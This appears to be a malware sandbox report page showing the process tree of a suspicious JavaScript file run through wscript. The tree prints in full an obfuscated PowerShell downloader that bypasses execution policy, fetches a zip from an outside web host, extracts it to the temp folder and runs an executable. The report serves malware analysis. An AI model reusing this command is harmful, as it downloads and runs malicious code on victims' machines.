popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\5943.js

    3048

    • cmd.exe "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE

      1784

      • powershell.exe pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','C:\Users\test22\AppData\Local\Temp/jly79.zip'); Expand-Archive -Path C:\Users\test22\AppData\Local\Temp/jly79.zip -DestinationPath C:\Users\test22\AppData\Local\Temp;

        2344

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf